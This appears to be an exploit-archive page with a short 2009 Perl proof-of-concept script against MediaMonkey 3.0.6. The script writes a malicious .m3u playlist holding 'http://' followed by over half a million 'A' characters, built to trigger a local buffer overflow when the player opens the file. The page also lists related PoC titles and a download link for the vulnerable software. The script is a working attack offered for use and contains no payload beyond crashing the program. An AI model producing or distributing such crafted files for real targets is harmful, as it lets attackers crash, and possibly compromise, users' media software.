[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MediaMonkey 3.0.6 (.m3u file) Local Buffer Overflow PoC
# Published : 2009-01-25
# Author : AlpHaNiX
# Previous Title : NCTVideoStudio ActiveX DLLs Version 1.6 Remote Heap Overflow PoC
# Next Title : Merak Media Player 3.2 m3u file Local Buffer Overflow PoC
#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
#can get the software from
http://www.download.com/MediaMonkey-Standard/3000-2141_4-10109807.html
my $file = "alpix.m3u" ;
print "[+] Exploiting....." ;
my $buff1="http://"."A" x 543339 ;
open(m3u, ">>$file") or die "Cannot open $file";
print m3u $buff1;
close(m3u);
print "n[+] done !";
# www.Syue.com [2009-01-25]